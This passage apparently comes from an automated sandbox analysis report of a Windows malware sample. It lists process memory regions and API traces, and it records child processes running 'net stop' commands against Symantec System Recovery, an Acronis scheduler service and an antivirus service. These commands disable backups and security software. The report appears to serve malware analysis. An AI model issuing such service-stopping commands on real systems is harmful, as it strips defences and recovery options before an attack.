HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4564 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4565 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4566 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4567 start_va = 0x1b0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 4568 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4569 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4570 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4571 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 4572 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4573 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4574 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 4575 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 4576 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 4577 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4578 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 427 os_tid = 0xfd0 Process: id = "82" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x2001f000" os_pid = "0x1010" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "78" os_parent_pid = "0xfac" cmd_line = "C:\\Windows\\system32\\net1 stop \"Symantec System Recovery\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4579 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4580 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4581 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4582 start_va = 0x110000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 4583 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4584 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4585 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4586 start_va = 0xfffd0000 end_va = 0x100002fff entry_point = 0xfffd0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 4587 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4588 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4589 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 4590 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 4591 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 4592 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4593 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4609 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4610 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4611 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4612 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 4613 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 4614 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4615 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4616 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 4617 start_va = 0x7fef8ed0000 end_va = 0x7fef8ee1fff entry_point = 0x7fef8ed0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 4618 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 4619 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 4620 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 4621 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 4622 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 4623 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 4624 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 4625 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 4626 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4627 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4628 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4629 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4630 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4631 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4632 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 451 os_tid = 0x1014 [0087.029] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f9f0 | out: lpSystemTimeAsFileTime=0x18f9f0*(dwLowDateTime=0xe90a39b0, dwHighDateTime=0x1d48689)) [0087.029] GetCurrentProcessId () returned 0x1010 [0087.029] GetCurrentThreadId () returned 0x1014 [0087.029] GetTickCount () returned 0x1f9d8 [0087.029] QueryPerformanceCounter (in: lpPerformanceCount=0x18f9f8 | out: lpPerformanceCount=0x18f9f8*=1813394800000) returned 1 [0087.031] GetModuleHandleW (lpModuleName=0x0) returned 0xfffd0000 [0087.031] __set_app_type (_Type=0x1) [0087.031] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xfffe9c9c) returned 0x0 [0087.031] __getmainargs (in: _Argc=0xffff4780, _Argv=0xffff4790, _Env=0xffff4788, _DoWildCard=0, _StartInfo=0xffff479c | out: _Argc=0xffff4780, _Argv=0xffff4790, _Env=0xffff4788) returned 0 [0087.031] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0087.031] GetConsoleOutputCP () returned 0x1b5 [0087.031] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffffcec0 | out: lpCPInfo=0xffffcec0) returned 1 [0087.031] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0087.033] sprintf_s (in: _DstBuf=0x18f998, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0087.033] setlocale (category=0, locale=".437") returned="English_United States.437" [0087.034] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0087.034] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0087.034] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"Symantec System Recovery\" /y" [0087.034] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f730, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0087.034] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0087.035] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x18f988 | out: Buffer=0x18f988*=0x33c0f0) returned 0x0 [0087.035] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x18f988 | out: Buffer=0x18f988*=0x33c110) returned 0x0 [0087.035] _fileno (_File=0x7fefdba2a80) returned 0 [0087.035] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0087.035] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0087.035] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0087.035] _wcsicmp (_String1="config", _String2="stop") returned -16 [0087.035] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0087.035] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0087.035] _wcsicmp (_String1="file", _String2="stop") returned -13 [0087.035] _wcsicmp (_String1="files", _String2="stop") returned -13 [0087.035] _wcsicmp (_String1="group", _String2="stop") returned -12 [0087.035] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0087.035] _wcsicmp (_String1="help", _String2="stop") returned -11 [0087.035] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0087.035] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0087.035] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0087.035] _wcsicmp (_String1="session", _String2="stop") returned -15 [0087.035] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0087.035] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0087.035] _wcsicmp (_String1="share", _String2="stop") returned -12 [0087.035] _wcsicmp (_String1="start", _String2="stop") returned -14 [0087.035] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0087.035] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0087.035] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0087.035] _wcsicmp (_String1="accounts", _String2="Symantec System Recovery") returned -18 [0087.035] _wcsicmp (_String1="computer", _String2="Symantec System Recovery") returned -16 [0087.035] _wcsicmp (_String1="config", _String2="Symantec System Recovery") returned -16 [0087.035] _wcsicmp (_String1="continue", _String2="Symantec System Recovery") returned -16 [0087.035] _wcsicmp (_String1="cont", _String2="Symantec System Recovery") returned -16 [0087.035] _wcsicmp (_String1="file", _String2="Symantec System Recovery") returned -13 [0087.036] _wcsicmp (_String1="files", _String2="Symantec System Recovery") returned -13 [0087.036] _wcsicmp (_String1="group", _String2="Symantec System Recovery") returned -12 [0087.036] _wcsicmp (_String1="groups", _String2="Symantec System Recovery") returned -12 [0087.036] _wcsicmp (_String1="help", _String2="Symantec System Recovery") returned -11 [0087.036] _wcsicmp (_String1="helpmsg", _String2="Symantec System Recovery") returned -11 [0087.036] _wcsicmp (_String1="localgroup", _String2="Symantec System Recovery") returned -7 [0087.036] _wcsicmp (_String1="pause", _String2="Symantec System Recovery") returned -3 [0087.036] _wcsicmp (_String1="session", _String2="Symantec System Recovery") returned -20 [0087.036] _wcsicmp (_String1="sessions", _String2="Symantec System Recovery") returned -20 [0087.036] _wcsicmp (_String1="sess", _String2="Symantec System Recovery") returned -20 [0087.036] _wcsicmp (_String1="share", _String2="Symantec System Recovery") returned -17 [0087.036] _wcsicmp (_String1="start", _String2="Symantec System Recovery") returned -5 [0087.036] _wcsicmp (_String1="stats", _String2="Symantec System Recovery") returned -5 [0087.036] _wcsicmp (_String1="statistics", _String2="Symantec System Recovery") returned -5 [0087.036] _wcsicmp (_String1="stop", _String2="Symantec System Recovery") returned -5 [0087.036] _wcsicmp (_String1="time", _String2="Symantec System Recovery") returned 1 [0087.036] _wcsicmp (_String1="user", _String2="Symantec System Recovery") returned 2 [0087.036] _wcsicmp (_String1="users", _String2="Symantec System Recovery") returned 2 [0087.036] _wcsicmp (_String1="msg", _String2="Symantec System Recovery") returned -6 [0087.036] _wcsicmp (_String1="messenger", _String2="Symantec System Recovery") returned -6 [0087.036] _wcsicmp (_String1="receiver", _String2="Symantec System Recovery") returned -1 [0087.036] _wcsicmp (_String1="rcv", _String2="Symantec System Recovery") returned -1 [0087.036] _wcsicmp (_String1="netpopup", _String2="Symantec System Recovery") returned -5 [0087.036] _wcsicmp (_String1="redirector", _String2="Symantec System Recovery") returned -1 [0087.036] _wcsicmp (_String1="redir", _String2="Symantec System Recovery") returned -1 [0087.036] _wcsicmp (_String1="rdr", _String2="Symantec System Recovery") returned -1 [0087.036] _wcsicmp (_String1="workstation", _String2="Symantec System Recovery") returned 4 [0087.036] _wcsicmp (_String1="work", _String2="Symantec System Recovery") returned 4 [0087.036] _wcsicmp (_String1="wksta", _String2="Symantec System Recovery") returned 4 [0087.036] _wcsicmp (_String1="prdr", _String2="Symantec System Recovery") returned -3 [0087.036] _wcsicmp (_String1="devrdr", _String2="Symantec System Recovery") returned -15 [0087.036] _wcsicmp (_String1="lanmanworkstation", _String2="Symantec System Recovery") returned -7 [0087.036] _wcsicmp (_String1="server", _String2="Symantec System Recovery") returned -20 [0087.036] _wcsicmp (_String1="svr", _String2="Symantec System Recovery") returned -3 [0087.036] _wcsicmp (_String1="srv", _String2="Symantec System Recovery") returned -7 [0087.036] _wcsicmp (_String1="lanmanserver", _String2="Symantec System Recovery") returned -7 [0087.036] _wcsicmp (_String1="alerter", _String2="Symantec System Recovery") returned -18 [0087.036] _wcsicmp (_String1="netlogon", _String2="Symantec System Recovery") returned -5 [0087.037] _wcsupr (in: _String="Symantec System Recovery" | out: _String="SYMANTEC SYSTEM RECOVERY") returned="SYMANTEC SYSTEM RECOVERY" [0087.037] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x33ce20 [0087.040] GetServiceKeyNameW (in: hSCManager=0x33ce20, lpDisplayName="SYMANTEC SYSTEM RECOVERY", lpServiceName=0xffff5750, lpcchBuffer=0x18f8a8 | out: lpServiceName="", lpcchBuffer=0x18f8a8) returned 0 [0087.042] _wcsicmp (_String1="msg", _String2="SYMANTEC SYSTEM RECOVERY") returned -6 [0087.042] _wcsicmp (_String1="messenger", _String2="SYMANTEC SYSTEM RECOVERY") returned -6 [0087.042] _wcsicmp (_String1="receiver", _String2="SYMANTEC SYSTEM RECOVERY") returned -1 [0087.042] _wcsicmp (_String1="rcv", _String2="SYMANTEC SYSTEM RECOVERY") returned -1 [0087.042] _wcsicmp (_String1="redirector", _String2="SYMANTEC SYSTEM RECOVERY") returned -1 [0087.042] _wcsicmp (_String1="redir", _String2="SYMANTEC SYSTEM RECOVERY") returned -1 [0087.042] _wcsicmp (_String1="rdr", _String2="SYMANTEC SYSTEM RECOVERY") returned -1 [0087.042] _wcsicmp (_String1="workstation", _String2="SYMANTEC SYSTEM RECOVERY") returned 4 [0087.042] _wcsicmp (_String1="work", _String2="SYMANTEC SYSTEM RECOVERY") returned 4 [0087.042] _wcsicmp (_String1="wksta", _String2="SYMANTEC SYSTEM RECOVERY") returned 4 [0087.042] _wcsicmp (_String1="prdr", _String2="SYMANTEC SYSTEM RECOVERY") returned -3 [0087.042] _wcsicmp (_String1="devrdr", _String2="SYMANTEC SYSTEM RECOVERY") returned -15 [0087.042] _wcsicmp (_String1="lanmanworkstation", _String2="SYMANTEC SYSTEM RECOVERY") returned -7 [0087.042] _wcsicmp (_String1="server", _String2="SYMANTEC SYSTEM RECOVERY") returned -20 [0087.042] _wcsicmp (_String1="svr", _String2="SYMANTEC SYSTEM RECOVERY") returned -3 [0087.042] _wcsicmp (_String1="srv", _String2="SYMANTEC SYSTEM RECOVERY") returned -7 [0087.042] _wcsicmp (_String1="lanmanserver", _String2="SYMANTEC SYSTEM RECOVERY") returned -7 [0087.043] _wcsicmp (_String1="alerter", _String2="SYMANTEC SYSTEM RECOVERY") returned -18 [0087.043] _wcsicmp (_String1="netlogon", _String2="SYMANTEC SYSTEM RECOVERY") returned -5 [0087.043] NetServiceControl (in: servername=0x0, service="SYMANTEC SYSTEM RECOVERY", opcode=0x0, arg=0x0, bufptr=0x18f8b0 | out: bufptr=0x18f8b0) returned 0x889 [0087.043] wcscpy_s (in: _Destination=0xffff80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0087.043] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0087.044] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffff5b50, nSize=0x800, Arguments=0xffff7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0087.045] GetFileType (hFile=0xb) returned 0x2 [0087.045] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f778 | out: lpMode=0x18f778) returned 1 [0087.045] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffff5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x18f770, lpReserved=0x0 | out: lpBuffer=0xffff5b50*, lpNumberOfCharsWritten=0x18f770*=0x1e) returned 1 [0087.046] GetFileType (hFile=0xb) returned 0x2 [0087.046] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f778 | out: lpMode=0x18f778) returned 1 [0087.046] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xfffd1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f770, lpReserved=0x0 | out: lpBuffer=0xfffd1efc*, lpNumberOfCharsWritten=0x18f770*=0x2) returned 1 [0087.046] _ultow (in: _Dest=0x889, _Radix=1636320 | out: _Dest=0x889) returned="2185" [0087.046] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffff5b50, nSize=0x800, Arguments=0xffff7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0087.047] GetFileType (hFile=0xb) returned 0x2 [0087.047] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f778 | out: lpMode=0x18f778) returned 1 [0087.047] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffff5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x18f770, lpReserved=0x0 | out: lpBuffer=0xffff5b50*, lpNumberOfCharsWritten=0x18f770*=0x34) returned 1 [0087.047] GetFileType (hFile=0xb) returned 0x2 [0087.047] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f778 | out: lpMode=0x18f778) returned 1 [0087.048] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xfffd1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f770, lpReserved=0x0 | out: lpBuffer=0xfffd1efc*, lpNumberOfCharsWritten=0x18f770*=0x2) returned 1 [0087.048] NetApiBufferFree (Buffer=0x33c0f0) returned 0x0 [0087.048] NetApiBufferFree (Buffer=0x33c110) returned 0x0 [0087.048] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"Symantec System Recovery\" /y" [0087.048] exit (_Code=2) Process: id = "83" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x20bf8000" os_pid = "0x101c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop AcrSch2Svc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4594 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4595 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4596 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4597 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 4598 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4599 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4600 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4601 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 4602 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4603 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4604 start_va = 0x7fffffd3000 end_va = 0x7fffffd3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 4605 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4606 start_va = 0xe0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 4607 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4608 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 453 os_tid = 0x1020 Process: id = "84" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x20417000" os_pid = "0x1068" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop Antivirus /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4633 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4634 start_va = 0x30000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4635 start_va = 0xb0000 end_va = 0xb3fff entry_point = 0x0 region_type = pagefile_backed name = 